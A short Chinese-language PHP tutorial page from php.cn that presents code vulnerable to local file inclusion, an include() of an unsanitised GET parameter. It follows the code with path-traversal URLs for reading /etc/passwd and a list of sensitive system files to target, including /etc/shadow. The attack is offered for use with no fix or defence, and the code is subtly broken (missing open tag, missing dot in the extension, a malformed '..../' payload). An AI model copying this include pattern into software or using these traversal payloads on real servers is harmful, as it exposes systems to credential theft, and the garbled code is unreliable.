简体中文(ZH-CN) English(EN) 繁体中文(ZH-TW) 日本語(JA) 한국어(KO) Melayu(MS) Français(FR) Deutsch(DE)
首页 > 后端开发 > php教程 > 正文

php 伪造本地文件包含漏洞的代码

高洛峰
发布: 2023-03-01 12:56:02
原创
1183 人浏览过

代码如下: 
$page=$_GET['page'];
include($page.'php');
?> 

你可以这样使用 
http://www.xxx.com/index.php?page=../etc/passwd 
http://www.xxx.com/index.php?page=../../../etc/passwd 
http://www.xxx.com/index.php?page=..../../etc/passwd 

获取更多数据: 
etc/profile 
etc/services 
/etc/passwd 
/etc/shadow 
/etc/group 
/etc/security/group 
/etc/security/passwd 
/etc/security/user 
/etc/security/environ 
/etc/security/limits 
/usr/lib/security/mkuser.default 

相关标签:
php
来源:php.cn
上一篇:php中使用explode查找某个字符是否存在的方法 下一篇: 有关php运算符的知识大全
本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
作者最新文章
最新问题
如何在 PHP 中使用 while 循环按 ID 列出节中的数据? 我有一个包含这些列的mysql表:series_id,series_color,product_name在输出中,我想按部分列出数据,每个series_id一个部分,如下所示:A1...
来自于 2023-11-17 20:03:03
0
1
290
未定义函数create_function()的调用 我在网站首页收到此消息:致命错误:未捕获错误:调用/customers/7/e/7/jovobytes.be/httpd.www/wp-content/themes/inovado...
来自于 2023-11-16 19:00:36
0
1
277
<?php //给定一个年月日,输出该日期是当年的第几天(注意闰年4 100 400) <?php //给定一个年月日,输出该日期是当年的第几天(注意闰年4 100 400) //可使用的技术路线:各类变量 例如数组 流程控制语句switch if el...
来自于 2023-11-14 23:55:21
0
1
79
PHP 修剪 unicode 空格 我正在尝试修剪诸如此字符之类的unicode空格,并且我能够使用此解决方案来做到这一点。此解决方案的问题是它不会修剪普通字符之间的unicode空格。例如这个使用薄空间$strin...
来自于 2023-11-13 08:49:45
0
2
398
TYPO3 V11: "PHP警告:未定义的数组键",$this->request->getArguments()为空 我是typo3的新用户,我制作了一个插件来显示用户,并使用搜索栏来过滤他们,但是当我想显示我的页面时出现此错误:(1/1)#1476107295TYPO3\CMS\Core\Err...
来自于 2023-11-12 21:35:09
0
1
362
相关专题
更多>
热门推荐
热门教程
更多>
相关教程
热门推荐
最新课程
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责声明 Sitemap
PHP中文网:公益在线PHP培训,帮助PHP学习者快速成长!